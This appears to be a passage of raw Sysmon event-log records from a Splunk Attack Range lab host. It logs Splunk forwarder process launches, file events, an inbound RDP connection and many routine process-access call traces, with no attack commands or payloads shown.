154100x8000000000000000980347Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:26.313{69CF5F33-8C9E-6151-F979-00000000FD01}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980346Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:26.234{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=046A735888A2D98598A821D2D2B4D885,SHA256=0F312FBCCC45090367AF1DA1E66A129A844196F13BE924A69AC62775992E74BC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980393Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:25.016{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59785-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000980392Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:24.872{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59476-false10.0.1.12-8000- 23542300x8000000000000000980391Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:27.937{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FB3FEC09EB2C47D3EA1EFA9A429FEE5E,SHA256=CFFF807AA28F46C4F795B3A947FBA6687D5CF05635578B04FD7521A4A88F8D62,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980390Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:27.765{69CF5F33-8C9F-6151-FB79-00000000FD01}9363940C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980389Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:27.625{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8C9F-6151-FB79-00000000FD01}936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980388Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:27.625{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980387Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:27.625{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980386Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:27.625{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980385Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:27.625{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980384Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:27.625{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980383Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:27.625{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980382Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:27.625{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980381Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:27.625{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980380Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:27.625{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980379Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:27.625{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8C9F-6151-FB79-00000000FD01}936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980378Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:27.609{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8C9F-6151-FB79-00000000FD01}936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980377Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:27.610{69CF5F33-8C9F-6151-FB79-00000000FD01}936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980376Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:27.281{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFFAFDE63DF620BF71CBC56AE8CD298B,SHA256=7C308FE77A2684D4EDC5CBD4D12A5F66C386B09F247F363F60F00F522E6114FE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980407Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:28.312{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8CA0-6151-FC79-00000000FD01}3584C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980406Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:28.312{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980405Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:28.312{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980404Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:28.312{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980403Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:28.312{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980402Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:28.312{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980401Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:28.312{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980400Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:28.312{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980399Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:28.312{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980398Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 